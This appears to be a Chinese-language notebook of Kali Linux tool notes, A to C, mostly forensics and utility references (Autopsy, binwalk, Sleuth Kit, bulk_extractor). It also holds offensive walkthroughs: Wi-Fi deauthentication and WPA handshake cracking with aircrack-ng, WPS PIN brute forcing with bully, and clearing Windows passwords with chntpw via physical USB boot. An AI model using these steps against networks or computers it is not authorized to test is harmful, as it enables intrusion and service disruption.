=对于部分istat软件和img软件 需要了解inode是什么==

==详情见我的另一篇文章 《shell编程学习》2.2中的内容==

==A==

arping(没写完)

arping命令是用于发送arp请求到相邻主机的工具，arping使用arp数据包
arping有两个版本，一个版本是Thomas Habets这个人写的，这个版本有个好处是可以arping <MAC地址>，也就是说我们可以通过MAC地址得到IP。

而我们kali上的arping就是这个版本的

语法

1

Usage: arping [-fqbDUAV] [-c count] [-w timeout] [-I device] [-s source] destination

-A：与-U参数类似，但是使用的是ARP REPLY包而非ARP REQUEST包。
-b：发送以太网广播帧，arping在开始时使用广播地址，在收到回复后使用unicast单播地址。
-c：发送指定的count个ARP REQUEST包后停止。如果指定了-w参数，则会等待相同数量的ARP REPLY包，直到超时为止。
-D：重复地址探测模式，即，Duplicate address detection mode (DAD)，用来检测有没有IP地址冲突，如果没有IP冲突则返回0。
-f：收到第一个响应包后退出。
-h：显示帮助页。
-I：用来发送ARP REQUEST包的网络设备的名称。
-q：quite模式，不显示输出。
-U：无理由的（强制的）ARP模式去更新别的主机上的ARP CACHE列表中的本机的信息，不需要响应。
-V：显示arping的版本号。
-w：指定一个超时时间，单位为秒，arping在到达指定时间后退出，无论期间发送或接收了多少包。在这种情况下，arping在发送完指定的count（-c）个包后并不会停止，而是等待到超时或发送的count个包都进行了回应后才会退出。
-s：设置发送ARP包的IP资源地址，如果为空，则按如下方式处理：
1、DAD模式（-D）设置为0.0.0.0；
2、Unsolicited模式（-U）设置为目标地址；
3、其它方式，从路由表计算。

实例

1、查看某个IP的MAC地址

有多个网卡可以用 -I 指定网卡接口

Atril文档查看器

就这样、常用于看pdf文件

左边目录右边数据

还挺好用的

autopsy

它是首屈一指的端到端开源数字取证平台。 由Basis Technology构建，具有您在商业取证工具中所期望的核心功能，Autopsy是一种快速，全面，高效的硬盘调查解决方案，可根据您的需求而发展。

使用方法

打开生成的链接

新建一个newcase

填好必要信息之后点击new case

点击add host

按照默认的设置继续点击add host

在下图中点击add image加载将要分析的镜像

选择校验hash值的选项，然后add

autopsy会计算文件的hash，点击ok即可

回来到如下界面

点击右侧的details可以查看镜像名称、volume ID、文件格式等细节

点击浏览器的返回按钮就可以返回先前的界面继续分析
在分析之前我们可以通过MD5 hash校验镜像的完整性，点击image integrity即可

点击validate按钮来验证

在左下角可以看到验证通过，点击close继续分析

主界面中点击analyse进行分析

之后进入到如下界面

点击上面的image details菜单

可以看到版本等详细信息，接下来点击file analysis

进入了文件浏览模式，可以查看镜像中的文件夹和文件，在主视区域可以可以看到项目的权限、大小、metadata等

在界面的左侧有四个主要的功能

点击expand direcroty，所有的内容都可以很容易被查看

点击前面的“+“，则在右侧的主视图的区域还有显示子目录
要查看删除的文件，可以点击all deleted files按钮

删除的文件在主视图区域被用红色字体标记
拉到最右边，点击meta下的链接

可以看到详细的信息。包括16进制的数据以及扩展名等
比如我们从图中可以看到原来的扩展名很奇怪，hmm

我们点击蓝色字体的1066

可以看到JPEG文件格式的特征。这意味着file7.hmm可能是一个jpeg文件，只不过扩展名被修改了

查看每个文件的元数据metadata并不现实，此时可以用到file type的功能
点击上面的file type一栏即可

点击左侧的sort files by type,以及右侧的ok

排序结束之后，归纳的结果就出来了

比如在上图中可以看到有5个扩展不匹配

接下来我们可以点击左侧的view sorted files查看排序后的文件

给出了输出文件夹的路径
按照相应路径打开即可

使用firefox打开index.html

扩展名不匹配的文件如下图所示

这五个文件可以进一步通过查看元数据进行分析，和上面的步骤是一样的
可能有时候某些意外暂停了这次的分析，下次启动时只需要点击open case

选中需要分析的case，点击ok就可以继续分析了

windows版本使用方法:https://www.wangan.com/docs/1658

aircrack-ng wifi

(最好在实体kali机中使用)

ifconfig查看你的网卡信息，wlan0即无线网卡

airmon-ng start wlan0(启动网卡监听模式)

启动后ifconfig查看一下，如果网卡名变成了wlan0mon了，则表示操作成功。

扫描附近wifi

airodump-ng wlan0mon

参数详解:

BSSID: MAC地址

PWR:信号强度，越小信号越强。

#Data:传输的数据, 数据越大对我们越有利, 大的夸张的可能在看电影

CH:信号频道

ESSID:wifi名称

抓包开始

然后输入命令:

1

airodump-ng -c 11 --bssid 2E:E9:D3:28:59:EB -w ``/home/chenglee/2018/` `wlan0mon

解析:

-c代表频道, 后面带的是频道

bssid: mac地址(物理地址)

-w代表目录(抓到的握手包放在这个目录下面)

wlan0mon: 网卡名称

一直跑吖跑, 它的数据是不停刷新变化的…

这时候应该做点什么了,利用deauth洪水攻击，取消目标路由和所有设备的无线连接，这时候设备重新连接时，会抓取他的握手包，然后用字典进行爆破.

新开一个窗口观察

下面是进行抓包然后破解出该密码

aireplay-ng -0 0 -a 2E:E9:D3:28:59:EB wlan0mon

这时候目标路由已经断网，如果抓到包记得ctrl+c关掉这里，否则一直断网就成恶作剧了。这时返回你抓包的那个窗口，如果右上角出现handshake这样的信息(看下图)，这说明抓包已经成功。

8.破解

输入：aircrack-ng -w ``/home/chenglee/dictionary/wpa``.txt ``/home/chenglee/2018/-01``.cap

解析:

-w后面接的是字典

-01.cap是握手包

也许过程会有点长, 这个得看密码复杂的与字典的好坏。

arpspof

https://x.hacking8.com/post-108.html

B

binwalk

1.固件分析扫描

2.提取文件系统

1
2
3
4
5

# 使用默认的预定义配置文件extract.conf
$ binwalk -e firmware.bin
 
# 使用指定自定义的配置文件my_extract.conf
$ binwalk --extract=./my_extract.conf firmware.bin

3.设置过滤选项

4.显示完整的扫描结果

5.固件文件的比较

6.日志记录

7.指令系统分析

8.熵分析

9.启发式分析

10.手动提取文件

-D, –dd=<type[:ext[:cmd]]>

Extracts files identified during a –signature scan. Multiple –dd options may be specified.

• type is a lower case string contained in the signature description (regular expressions are supported)
• ext is the file extension to use when saving the data disk (default none)
• cmd is an optional command to execute after the data has been saved to disk

By default, the file name is the hexadecimal offset where the signature was found, unless an alternate file name is specified in the signature itself.

The following example demonstrates specifying an extraction rule using the –dd option that will extract any signature that contains the string ‘zip archive’ with a file extension of ‘zip’, and subsequently execute the ‘unzip’ command. Additionally, PNG images are extracted as-is with a ‘png’ file extension.

Note the use of the ‘%e’ placeholder. This placeholder will be replaced with the relative path to the extracted file when the unzip command is executed:

其他附加操作详见https://blog.csdn.net/wxh0000mm/article/details/85683661

blkcalc

描述：

在未分配的磁盘单元编号和常规磁盘单元编号之间进行转换。
  blkcalc在两个映像之间创建磁盘单元号映射，一个映像与另一个映像仅包含第一个映像的未分配单元（blkls（1）程序的默认行为）.- d，-s或-u选项之一 如果给定了-d选项，则unit_addr值是常规映像（即从dd开始）中的磁盘单元地址。 如果未分配单元，则会在未分配的映像中给出其地址。 如果给出-u选项，则unit_addr值是未分配单元映像中的磁盘单元地址（即来自blkls（1）），并确定其在原始映像中的磁盘单元地址。 如果指定了-s选项，则unit_addr值是备用映像中的磁盘单元地址（即来自blkls -s的地址）。 该图片是完整的原始图片（即来自dd的图片）。 在3.0.0之前的TSK版本中，blkcalc被称为dcalc。
  要读取的磁盘或分区映像，其格式用“-i”指定。 如果图像被分割成多个段，则可以指定多个图像文件名。 如果仅给出一个图像文件，并且其名称是序列中的第一个文件（例如，以’.001’结尾的文件），则会自动包含后续的图像段。 当关键字搜索由blkls生成的图像时，此功能很有用。 这样一来，您可以识别原始单元地址并提供更好的文档。

选项：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

-f fstype 
	标识映像的文件系统类型。使用'-f 列表'列出支持的文件系统类型。如果没有给出，则使用自动检测方法。
	
-i imgtype
	标识图像文件的类型，例如原始文件。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。

-o imgoffset
	在映像中文件系统开始的扇区偏移量。

-b dev_sector_size
	基础设备扇区的大小（以字节为单位）。 如果未给出，则使用图像格式的值（如果存在）或假定为512字节。

-v
	详细输出到标准代码。

-V
	显示版本信息

blkcat

描述：

针对image(磁盘映像)或者图像

blkcat-在磁盘映像中显示文件系统数据单元的内容。

blkcat从图像到标准输出的单位地址unit_addr以不同格式显示num数据单位（默认为1）（默认为原始）。在3.0.0之前的TSK版本中，blkcat被称为dcat。

参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

-a

以ASCII格式显示内容

-f fstype

将图像指定为特定文件类型。如果在此处提供'swap'，则图像将以4096字节的大小显示。如果提供'raw'，则使用512字节作为默认大小.'- u '标志可以更改默认大小。使用'-f list'列出支持的文件系统类型。如果未给出，则使用自动检测方法。

-h

以16进制显示内容

-s

显示图像的统计信息(单位大小、文件块大小和片段数量)。

-u unit_size

指定原始图像，blkls和交换图像的默认数据单元的大小。

-i imgtype

标识图像文件的类型，例如原始文件。使用“ -i列表”列出支持的类型。如果未给出，则使用自动检测方法。

-o imgoffset

文件系统在映像中开始的扇区偏移量。

-b dev_sector_size

基础设备扇区的大小（以字节为单位）。如果未给出，则使用图像格式的值（如果存在）或假定为512字节。

-v

详细输出到标准代码

-V

打印版本信息

-w

以HTML表格格式显示内容。

Image [images]

要读取的磁盘或分区映像，其格式用'-i'指定。如果图像被分割成多个段，则可以指定多个图像文件名。如果仅给出一个图像文件，并且其名称是序列中的第一个图像文件（例如，以'.001'结尾的文件），则会自动包含后续的图像段。

unit_addr

要显示的磁盘单元的地址。可以使用-s选项确定该文件系统上单元的大小。

num

要显示的数据单元数。

blkcat的基本功能也可以使用dd来实现。要确定哪个inode已经分配了给定的单元，可以使用ifind(1)命令。

blkstat

描述：

针对image(磁盘映像)或者图像

显示文件系统数据单元的详细信息(例如块或扇区)。
blkstat显示给定数据单元的分配状态。在3.0.0之前的TSK版本中，blkstat被称为dstat。

参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

-f fstype
指定文件系统类型。使用'-f list'列出支持的文件系统类型。如果未给出，则使用自动检测方法。

-i imgtype
识别图像文件的类型，如raw。使用'-i list'列出支持的类型。如果未给出，则使用自动检测方法。

-o imgoffset
文件系统在映像中开始的扇区偏移量。

-bdev_sector_size
基础设备扇区的大小（以字节为单位）。如果未指定，则使用图像格式的值（如果存在）或假定为512字节。

-v
将调试语句详细输出到stderr

-V
打印版本信息

image[images]
要读取的磁盘或分区映像，其格式用'-i'指定。如果图像被分割成多个段，则可以指定多个图像文件名。如果仅给出一个图像文件，并且其名称是序列中的第一个图像文件（例如，以'.001'结尾的文件），则会自动包含后续的图像段。

addr
显示统计信息的地址。这是UNIX文件系统或FAT扇区的片段。

bulk_extractor

介绍

bulk_extractor是从数字证据文件中提取诸如电子邮件地址,信用卡号,URL和其他类型的信息的功能的程序。 它是一个有用的取证调查工具,可以用于许多任务,如恶意软件和入侵调查,身份调查和网络调查,以及图像分析和密码破解。 该程序提供了几个不寻常的功能:

1.发现其他工具发现不了的信息,如电子邮件地址,URL和信用卡号码,得益于它能处理压缩数据(如ZIP,PDF和GZIP文件)以及不完整或部分损坏的数据。 它可以从压缩数据的片段中提取JPEG文件,办公文档和其他类型的文件 ,还可以自动检测并提取加密的RAR文件。
2.根据数据中发现的所有单词构建单词列表,甚至可以是在未分配空间的压缩文件中的数据。 这些单词列表可用于密码破解。
3.多线程的; 速度快节约时间
4.分析完之后创建直方图,显示电子邮件地址,URL,域名,搜索关键词和其他类型的信息。

bulk_extractor可以对磁盘映像,文件或文件目录进行分析,并在不分析文件系统或文件系统结构的情况下提取有用的信息。 输入被分割成页面并由一个或多个扫描器处理。 结果存储在特征文件中,可以使用其他自动化工具轻松检查,解析或处理。

bulk_extractor还创建了它所发现的特征的直方图。 这样非常有用,因为诸如电子邮件地址和网络搜索关键词的功能往往很常见且重要。

除了上述功能之外,bulk_extractor还包括以下功能:

5.具有浏览特征文件中存储的功能以及启动bulk_extractor扫描的图形用户界面的Bulk Extractor Viewer
6.少量用于对特征文件进行额外分析的python程序

功能

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133

bulk_extractor - 在不解析文件系统的情况下提取信息。
bulk_extractor version 1.6.0-dev
用法:bulk_extractor [选项] 文件
运行bulk_extractor并提取摘要信息并输出到文件
必需参数:
imagefile - 要提取的文件
或者-R filedir - 遍历目录下的文件
支持E01文件
支持AFF文件
-o outdir - 指定输出目录,目录不得已存在
bulk_extractor将创建此目录
选项:
-i - 信息模式。快速分析随机取样的样本并打印报告
-b banner.txt- 将banner.txt内容添加到每个输出文件的头部
-r alert_list.txt- 包含提醒作业的警报列表的文件
(可以是特征文件或全局列表)
(可以重复)
-w stop_list.txt - 包含功能停止列表的文件(白名单)
(可以是特征文件或全局列表)
(可以重复)
-F <rfile> - 从<rfile>读取正则表达式列表以查找
-f <regex> - 查找出现的<regex>;可能重复。
结果存入find.txt
-q nn- 静默的模式;只输出nn级别的状态报告。默认值0; -1,没有状态输出
-s frac [:passes] - 设置随机抽样参数
调整参数:
-C NN- 指定上下文窗口的大小(默认值为16)
-S fr:<name>:window = NN - 指定录像机到NN的上下文窗口
-S fr:<name>:window_before = NN- 指定之前的上下文窗口到NN为记录器
-S fr:<name>:window_after = NN - 指定后缀到NN后的上下文窗口
-G NN- 指定页面大小(默认16777216)
-g NN- 指定余量(默认4194304)
-j NN- 要运行的分析线程数(默认4)
-M nn- 设置最大递归深度(默认7)
-m <max> - 所有数据读取后等待的最大分钟数(默认60)
路径处理模式:
-p <path> / f - 以给定的格式打印<path>的值。
格式:r = 源格式; h = 十六进制格式。
指定-p - 进行交互模式
指定-p -http为HTTP模式
并行化:
-Y <o1>- 在o1开始处理(o1可以是1,1K,1M或1G)
-Y <o1> - <o2> - 处理o1-o2
-A <off> - 将<off>添加到所有报告的特征偏移
调试:
-h - 打印此消息
-H - 打印扫描仪的详细信息
-V - 打印版本号
-z nn- 从第nn页开始
-dN- 调试模式(参见源代码)
-Z - 清除输出目录
扫描控制:
-P <dir> - 指定一个插件目录
默认目录包括/usr/local/lib/bulk_extractor,/usr/lib/bulk_extractor和
BE_PATH环境变量
-e <scanner> 启用扫描器 - -e all 全部启用
-x <scanner> 禁用扫描器 - -x all 全部禁用
-E <scanner> - 关闭除指定扫描器以外的所有扫描器
(与-x all -e <scanner>效果一样)
注意:-e,-x和-E命令按顺序执行
例如:'-E gzip -e facebook'只运行gzip和facebook
-S name = value - 将批量提取器选项名称设置为值
可设置选项(及其默认值):
-S work_start_work_end = YES 在report.xml文件中记录每个扫描器的工作开始和结束时间
-S enable_histograms = YES 禁用生成直方图
-S debug_histogram_malloc_fail_frequency = 0 设置大于零记录内存分配失败直方图
-S hash_alg = md5指定用于所有哈希计算的哈希算法
-S dup_data_alerts =NO 重复数据未处理时通知
-S write_feature_files = YES 写入特征文件
-S write_feature_sqlite3 = NO将特征文件写入report.sqlite3
-S report_read_errors = YES报告读取错误
-S carve_net_memory = NO 提取网络内存结构(net)
-S word_min = 6最小字大小(wordlist)
-S word_max = 14 最大字大小(wordlist)
-S max_word_outfile_size = 100000000 输出文件的最大大小(wordlist)
-S wordlist_use_flatfiles = YES覆盖SQL设置并对wordlist(wordlist)使用flatfiles
-S ssn_mode = 00=正常格式; 1=不需要SSN; 2=去掉破折号(accts)
-S min_phone_digits = 7手机所需的数字(accts)
-S exif_debug = 0读取exif信息(exif)
-S jpeg_carve_mode = 1 0=不提取; 1=雕刻编码提取; 2=全部提取(exif)
-S min_jpeg_size = 1000将被雕刻的最小的JPEG流(exif)
-S zip_min_uncompr_size = 6ZIP未压缩对象的最小大小(zip)
-S zip_max_uncompr_size = 268435456ZIP未压缩对象的最大大小(zip)
-S zip_name_len_max = 1024 ZIP组件的最大名称filename(zip)
-S unzip_carve_mode = 10=不提取; 1=雕刻编码提取; 2=全部提取(zip)
-S rar_find_components = YES 搜索RAR组件(rar)
-S rar_find_volumes = YES搜索RAR卷(rar)
-S unrar_carve_mode = 10=不提取; 1=雕刻编码提取; 2=全部提取(rar)
-S gzip_max_uncompr_size = 268435456 解压缩GZIP对象的最大大小(gzip)
-S pdf_dump = NO 转储PDF缓冲区的内容(pdf)
-S pdf_dump = NO 转储PDF缓冲区的内容(msxml)
-S winpe_carve_mode = 10=不提取; 1=雕刻编码提取; 2=全部提取(winpe)
-S opt_weird_file_size = 157286400 FAT32扫描(windir)的阈值
-S opt_weird_file_size2 = 536870912FAT32扫描(windir)的阈值
-S opt_weird_cluster_count = 67108864FAT32扫描(windir)的阈值
-S opt_weird_cluster_count2 = 268435456FAT32扫描(windir)的阈值
-S opt_max_bits_in_attrib = 3忽略更多属性设置的FAT32条目(windirs)
-S opt_max_weird_count = 2 忽略奇怪的FAT32条目(windirs)
-S opt_last_year = 2022忽略晚于此FAT32条目(windirs)
-S xor_mask = 255设置XOR掩码值,十进制格式(xor)
-S sqlite_carve_mode = 2 0=不提取; 1=雕刻编码提取; 2=全部提取(sqlite)
以下扫描默认禁用;启用使用-e命令:
-e base16 - 启用扫描base16
-e facebook - 启用扫描facebook
-e outlook- 启用扫描outlook
-e sceadan- 启用扫描sceadan
-e wordlist - 启用扫描wordlist
-e xor- 启用扫描xor
以下扫描默认启用;禁用使用-x命令:
-x accts- 禁用扫描程序
-x aes- 禁用扫描aes
-x base64 - 禁用扫描base64
-x elf- 禁用扫描elf
-x mail - 禁用扫描邮件
-x exif - 禁用扫描exif
-x find - 禁用扫描发现
-x gps- 禁用扫描gps
-x gzip - 禁用扫描gzip
-x hiberfile- 禁用扫描hiberfile
-x httplogs - 禁用扫描httplogs
-x json - 禁用扫描json
-x kml- 禁用扫描kml
-x msxml- 禁用扫描msxml
-x net- 禁用扫描net
-x pdf- 禁用扫描pdf
-x rar- 禁用扫描rar
-x sqlite - 禁用扫描sqlite
-x vcard- 禁用扫描vcard
-x windirs- 禁用扫描windirs
-x winlnk - 禁用扫描winlnk
-x winpe- 禁用扫描winpe
-x zip- 禁用扫描zip
-x winprefetch - 禁用扫描winprefetch

示例

分析映像文件后,将结果导出到输出目录(-o bulk-out)(xp-laptop-2005-07-04-1430.img):

aliyunzixun@xxx.com:~# bulk_extractor -o bulk-out xp- laptop-2005-07-04-1430.img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

bulk_extractor version 1.6.0-dev
   Hostname: kali
   Input file: xp-laptop-2005-07-04-1430.img
   Output directory: bulk-out
   Disk Size: 536715264
   Threads: 1
   Phase 1.
   13:02:46 Offset 0MB (0.00%) Done in n/a at 13:02:45
   13:03:39 Offset 67MB (12.50%) Done in0:06:14 at 13:09:53
   13:04:43 Offset 134MB (25.01%) Done in0:05:50 at 13:10:33
   13:04:55 Offset 201MB (37.51%) Done in0:03:36 at 13:08:31
   13:06:01 Offset 268MB (50.01%) Done in0:03:15 at 13:09:16
   13:06:48 Offset 335MB (62.52%) Done in0:02:25 at 13:09:13
   13:07:04 Offset 402MB (75.02%) Done in0:01:25 at 13:08:29
   13:07:20 Offset 469MB (87.53%) Done in0:00:39 at 13:07:59
   All Data is Read; waiting for threads to finish...
   Time elapsed waiting for 1 thread to finish:
   (please wait for another 60 min .)
   Time elapsed waiting for 1 thread to finish:
   6 sec (please wait for another 59 min 54 sec.)
   Thread 0: Processing 520093696
   Time elapsed waiting for 1 thread to finish:
   12 sec (please wait for another 59 min 48 sec.)
   Thread 0: Processing 520093696
   Time elapsed waiting for 1 thread to finish:
   18 sec (please wait for another 59 min 42 sec.)
   Thread 0: Processing 520093696
   Time elapsed waiting for 1 thread to finish:
   24 sec (please wait for another 59 min 36 sec.)
   Thread 0: Processing 520093696
   Time elapsed waiting for 1 thread to finish:
   30 sec (please wait for another 59 min 30 sec.)
   Thread 0: Processing 520093696
   All Threads Finished!
   Producer time spent waiting: 335.984 sec.
   Average consumer time spent waiting: 0.143353 sec.
   *******************************************
   ** bulk_extractor is probably CPU bound. **
   **Run on a computer with more cores**
   **to get better performance. **
   *******************************************
   Phase 2. Shutting down scanners
   Phase 3. Creating Histograms
   ccn histogram... ccn_track2 histogram... domain histogram...
   email histogram... ether histogram... find histogram...
   ip histogram... tcp histogram... telephone histogram...
   url histogram... url microsoft-live... url services...
   url facebook-address... url facebook-id... url searches...
   Elapsed time: 378.5 sec.
   Overall performance: 1.418 MBytes/sec.
   Total email features found: 899

bully

描述：

是 WPS 穷举法的一个新实现，用 c 语言编写。它在概念上与其他程序相同，因为它利用了 WPS 规范中的(现在众所周知的)设计缺陷。与原始的reaver 代码相比，它有几个优点。其中包括减少依赖项、改进内存和 cpu 性能、正确处理 endianness 以及更健壮的选项集。它运行在 Linux 上，并且是专门为在嵌入式 Linux 系统(OpenWrt 等)上运行而开发的，无论其体系结构如何。

必需参数：

-b,–bssid macaddr
目标接入点的MAC地址

-e,–essid string
接入点的扩展SSID

可选参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

-c,--channel N[,N…]
AP的信道号或要跳的列表[b /g]

-i,--index N
启动pin索引（7或8位数字）[自动]

-l,--lockwait N
如果AP锁定WPS，则要等待的秒数[43]

-o,--outfile file
消息输出文件

-p,--pin N
启动pin号(7位或8位)[自动]

-s,--source macaddr
源(硬件)MAC地址[探针]

-u,--lua
Lua脚本文件

-v,--verbosity N
详细程度1-4，其中1最简洁[3]

-w,--workdir path
pin/会话文件的位置[~/.bully/]

-5,--5ghz
跳到5GHz a / n默认频道列表[否]

-B,--bruteforce
WPS pin校验和数字[否]

-F,--force
尽管发出警告，仍然继续强制进行[否]

-S,--sequential
pin序列(不随机)[No]

-T,--test
测试模式(不注入任何数据包)[否]

高级参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

-d,--pixiewps
尝试使用pixiewps[否]

-a,--acktime N
弃用/忽略[自动]

-r,--retries N
未确认时重新发送数据包N次[2]

-m,--m13time N
弃用/忽略[自动]

-t,--timeout N
弃用/忽略[自动]

-1,--pin1delay M,N
在M5的第N个小节延迟M秒[0,1]

-2,--pin2delay M,N
在M7的第N个小节延迟M秒[5,1]

-A,--noacks
对发送的数据包禁用ACK检查[否]

-C,--nocheck
跳过CRC / FCS验证（性能）[否]

-D,--detectlock
检测AP未报告的WPS锁定[否]

-E,--eapfail
EAP失败会终止每次交换[否]

-L,--lockignore
忽略AP报告的WPS锁[否]

-M,--m57nack
作为WSC_NACK的M5/M7超时处理[否]

-N,--nofcs
数据包不包含FCS字段[自动]

-P,--probe
对非信标AP使用探测请求[否]

-Q,--wpsinfo
使用探测请求收集WPS信息[否]

-R,--radiotap
假设存在radiotap标头[自动]

-W,--windows7
伪装成Windows 7注册商[否]

-Z,--suppress
抑制数据包节流算法[否]

-V,--version
打印版本信息

-h,--help
打印帮助信息

burpsuite

不用讲了

C

cadaver

描述：

cadaver是WEBDAV的 客户端

WebDAV协议允许用户通过HTTP保存和共享文件，这是一个非常有价值的突破，因为HTTP通常是只读的，除了访问文档外，用户可以编辑和重新上传它 们，你可以将其理解为一种基于HTTP的网络文件系统，或一种支持长距离文件协作的方法。WebDAV协议支持文件锁和版本控制，因此，当你访问到 WebDAV文件夹后，你就可以编辑文件，不用担心会覆盖其他人的编辑成果。时至今日，虽然在线协作的方法越来越多，但WebDAV在文件共享方面仍然有 它的用处，特别是有很多的服务器和客户端软件支持它。

adaver支持文件上载，下载，屏幕显示，名称空间操作（移动和复制），集合创建和删除以及锁定操作，其操作类似于标准BSD ftp（1）客户端和Samba项目的smbclient（1）。 熟悉这些工具的用户应该会对cadaver相当熟悉。
cadaver支持通过.netrc文件自动登录到需要身份验证的服务器（类似于ftp（1）

选项：

1
2
3
4
5
6
7
8
9
10
11
12
13
14

-t,--tolerant
	允许cd / ope进入未启用WebDAV的集合； 如果服务器或代理服务器有WebDAV合规性问题，请使用。

-r,--rcfile=file
	使用此rcfile而不是默认的〜/ .cadaverrc

-p,--proxy=host[:port]
	使用代理主机“host”和可选代理端口“port”连接。

-V,--version
	显示版本信息

-h,--help
	显示帮助信息

. netrc文件

文件~/.netrc可用于自动登录到需要身份验证的服务器。可以使用以下标记(用空格、制表符或换行符分隔):
  机器主机
    标识一个远程计算机主机，它与命令行上给定的主机名相比较，或者作为打开命令的参数。直到文件末尾或下一个机器或默认令牌的任何后续令牌都与此条目相关联。
  默认
    这等效于机器令牌，但匹配任何主机名。 只能使用一个默认令牌，并且必须在所有机器令牌之后。
  登录用户名
    指定登录到远程计算机时使用的用户名
  密码
    指定登录到远程计算机时使用的密码。

Catfish

文件快速搜素工具，类似windows上的Everything

cewl

cewl通过爬行网站获取关键信息创建一个密码字典。

官网：http://digi.ninja/projects/cewl.php

用法：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

cewl [OPTION] ... URL

cewl [选项] ... URL

--help，-h：显示帮助

--keep，-k：保留下载的文件

--depth x，-d x：深度到蜘蛛，默认2

--min_word_length，-m：最小字长，默认为3

--offsite，-o：让蜘蛛访问其他网站

--write，-w file：将输出写入文件

--ua，-u user-agent：用户代理发送

--no-words，-n：不输出单词表

--meta， -a 包含元数据

--meta_file file：元数据的输出文件

--email，-e包括电子邮件地址

--email_file file：电子邮件地址的输出文件

--meta-temp-dir directory：exiftool在解析文件时使用的临时目录，默认为/ tmp

--count，-c：显示找到的每个单词的计数

认证

--auth_type：摘要或基本

--auth_user：认证用户名

--auth_pass：认证密码

代理支持

--proxy_host：代理主机

--proxy_port：代理端口，默认8080

--proxy_username：代理的用户名，如果需要的话

--proxy_password：代理的密码（如果需要）

Headers头

--header, -H: 格式名称：值 - 可以传递多个

--verbose, -v: 详细

URL: 蜘蛛网站。

示例：

cewl -v www.fujieace.com

cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt （1.1.1.1可以是目标网站的ip地址，也可以是网址）

-m:最小单词长度
-d:爬网深度
-e:收集包含emali地址信息
-c:每个单词出现的次数
支持基本，摘要，身份验证

更多详细用法:

https://www.ddosi.org/cewl/

cherryTree

一个富文本软件

chntpw

这个在实战中只能用于物理攻击

或者针对window虚拟机(因为虚拟机可以开启虚拟映像)

描述：

覆盖Windows系统密码的实用程序。
  chntpw是一个实用程序，用于查看一些信息并重置Microsoft Windows操作系统（在NT3.x和更高版本中）使用的Windows NT / 2000 SAM用户数据库文件中的用户密码。 该文件通常位于Windows文件系统上的\ WINDOWS \ system32 \ config \ SAM中。 无需知道先前的密码即可重置它们。 此外，它还包含一个简单的注册表编辑器和ahex编辑器，可以使用它浏览和修改注册表文件中包含的信息。
  该程序应该能够处理32位和64位Microsoft Windows以及从NT3.x到Win8.1的所有版本。

选项：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

-h
	显示选项的摘要信息。

-u username
	要更改的用户名或用户名ID（RID）。 默认值为“Administrator”。

-l
	列出SAM数据库中的所有用户，然后退出。

-i
	交互菜单系统:列出所有用户(按-l选项)，然后要求用户更改。

-e
	功能有限的注册表编辑器(但它确实包括写支持)。有关更强大的编辑器，请参阅reged

-d
	使用缓冲调试器代替(十六进制编辑器)

-L
	将所有更改的文件名记录到/ tmp / changed。 设置此选项后，程序将自动将更改保存在配置单元文件中，而不会提示用户。 在多用户系统中将-L选项作为root用户使用时要小心。 文件名是固定的，恶意用户可以使用它（删除具有相同名称的符号链接）来覆盖系统文件。

-N
	不要分配更多信息，仅允许编辑相同大小的现有值。

-E
	不要展开配置单元文件（安全模式）。

-v
	打印详细信息和调试消息。

操作的工具需要一个kaili live系统，将目标机器设为USB启动，这样就可以通过USB在目标机器上启动kali了。

进入Kali后，将挂载包含Windows文件夹的硬盘，进入到SAM的目录下，再使用chntpw工具清空密码信息，最后退出系统弹出U盘并启动目标系统，就可以空密码登陆系统了。
命令演示：

可以直接回车使用默认选择的用户也可以输入用户的RID指定用户

选择1后，显示Password cleared！

参考::https://blog.csdn.net/Vincent_zhang1949/article/details/105046599?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_antiscanv2&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_antiscanv2&utm_relevant_index=1

clang

clang-Clang C，C ++和Objective-C编译器。

clang是一个C、c++和Objective-C编译器，它包含预处理、解析、优化、代码生成、汇编和链接。根据传递的高级模式设置，Clang会在完成完整链接之前停止。尽管Clang是高度集成的，但重要的是了解编译的阶段，了解如何调用它。

指令好多:
详情参考https://blog.csdn.net/qq_40399982/article/details/112379293

爱奇艺教程:

https://www.iqiyi.com/w_19rutgeipt.html

clang++

clang++是一款LLVM编译器；跟linux下的gcc、gc++编译器差不多。

它是clang的另一个升级版本，使用方法其实都是一样的。同理于c语言和c++；

clang就好比gcc编译器；

clang++就好比gc++编译器；

Clipboard Manager Settings

剪贴板配置管理器

commix

